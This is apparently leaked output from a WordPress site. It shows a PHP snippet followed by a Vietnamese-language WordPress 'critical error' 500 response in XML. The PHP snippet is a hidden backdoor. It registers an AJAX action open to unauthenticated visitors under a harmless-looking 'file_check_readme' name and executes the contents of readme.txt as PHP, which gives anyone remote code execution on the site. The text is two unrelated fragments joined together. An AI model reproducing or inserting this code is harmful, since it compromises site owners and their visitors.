
if(!function_exists('file_check_readme83998')){
   add_action('wp_ajax_nopriv_file_check_readme83998', 'file_check_readme83998');
   add_action('wp_ajax_file_check_readme83998', 'file_check_readme83998');
   function file_check_readme83998()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<error>
    <code>internal_server_error</code>
    <title><![CDATA[WordPress &amp;rsaquo; Lỗi]]></title>
    <message><![CDATA[&lt;p&gt;Đã có một lỗi nghiêm trọng trên trang web của bạn.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://wordpress.org/documentation/article/faq-troubleshooting/&quot;&gt;Tìm hiểu thêm về gỡ lỗi trong WordPress.&lt;/a&gt;&lt;/p&gt;]]></message>
    <data>
        <status>500</status>
    </data>
</error>
